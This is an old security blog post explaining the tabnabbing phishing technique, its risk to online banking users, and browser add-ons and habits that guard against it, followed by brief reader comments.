Tabnabbing:Email & Online Banking Vulnerabilities and Countermeasures

In many of my post I have pointed out the concept of  "Phishing" in  Email hacking,where the attacker sends a fake/spoof  login page to the victim having manipulated the url to create some sort of illusion.Few months back "Aza Raskin" the Creative Lead  of Mozilla Firefox describes  a new form of  Phishing attack called "Tabnabbing" which manipulates the Tab browsing  of the users.

 What is Tabnabbing?

I feel  you can guess the work it does from its name,Tab means "the different windows attached to the same browser" and Nabbing means "to seize something forcefully".In the same way  for Tabnabbing ,when the user has opened up multiple tabs in the browser and after sometime comes back to one of the earlier opened tab then he/she finds that the content,title,favicon of that tab has changed to a login page of any email account or bank  login from  manipulating the tabs of the browser the attacker manipulates the memory of the victim because if the user does not remember what  website he/she had open in that tab then  he/she would login to that fake page thinking that it was open by him/

Check out the video to see the demo.

A New Type of Phishing Attack from Aza Raskin on Vimeo.

How does it works?

The main concept behind this is that  the attacker puts a Javascript in the pagesource code which waits for a certain period of delay and then  changes its favicon,title and content.It is more evil if it the script is intelligent enough which means it detect which sites the user visits normally and then accordingly switch to that site using tabnabbing.

Why is online banking is more vulnerable to this?

In online banking you must have noticed that  if you have logged in to the official page and left it idle for few minutes then it is automatically logged out.Due to this feature Tabnabbing is very  handy in attacking users of online banking beacause the users feel that  he/she would have logged in to the bank account and the session has expired.

 I would recommend Mozilla Firefox browser for web access because it has many security addons which are very handy and easy to use.

1.WOT:Marks the websites with colour and warns the users.(Download)

2.NoScript:This addon protects from XSS,IFrames,ClickJacking,stops Javascript.(Download)

3.Safe:Makes SSL  and extended SSL moree visible to user.(Download)

4.Secure Login:It has a feature to enable or disable Javascript and manages the password manger of Mozilla.(Download)
5.PhishTankSiteChecker:It warns the user about a phish attack.(Download)

6.Close all the browser tabs and web based applications that uses browser cache when using online banking.

7. You can also use some Linux Live CD to access internet while using online banking.


If you find this post worthy  to read  do post a comment , it will be appreciated.

Suggest Article

Subscribe to Posts....

Enter your Email-ID and get "Security Tips and Hacking Tutorials"alert in your inbox,we promise to keep your email private and safe.

comment 7 comments:

Shabnam Sultan on July 20, 2010 at 7:43 PM said...

I will be more alert while accessing online banking.

I use FF do i still need to fear about phishing attacks :)

Satyajit Das(Admins) on July 21, 2010 at 4:58 PM said...

@Shabnam actually mozilla firefox is the safest browser due to the addons it has....but it is does not make you hack proof.....your privacy can still can be manipulated....but you can avoid that to some extent by staying vigilant....while accessing net....thnks for visiting.... :)

Shekhar Sahu on July 23, 2010 at 7:01 PM said...

you are paying good efforts to your blog, Please take my suggestion, without any loss of time get a domain name soon.

Satyajit Das(Admins) on July 23, 2010 at 10:32 PM said...

@Shekhar thanks for your suggestion...i was also thinking that......anyways thanks for visiting..... :)

sureshpeters on July 29, 2010 at 10:19 AM said...

wow man..good info about tab nabbing..!! tnx a lot

Satyajit Das(Admins) on July 29, 2010 at 11:46 AM said...

Hey Suresh thanks for visiting....

Ayush on September 24, 2010 at 9:42 PM said...

Grt info keep sharing...

Post a Comment

This blog is "DoFollow",Use a "Real Name" rather than using "Keywords" otherwise comment will be rejected.

Delete this element to display blogger navbar

© 2018 SecurityHunk All Rights Reserved and Template by Fresh Blogger Templates